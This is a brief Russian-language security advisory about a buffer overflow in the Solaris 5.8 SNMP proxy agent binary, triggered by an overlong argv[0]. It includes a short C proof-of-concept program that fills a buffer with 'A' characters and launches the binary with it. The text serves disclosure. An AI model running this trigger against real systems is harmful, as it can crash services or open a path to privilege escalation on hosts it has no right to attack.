Команда /opt/SUNWssp/snmpd (SNMP proxy agent) содержит буферное переполнение. Баг случается, когда процесс приложения (argv[0]) скопирован во внутреннюю переменную без проверки длины.

Системы уязвимы:
Sun Solaris 5.8

Exploit:
#include <stdio.h>
void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
}

Пример бага

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии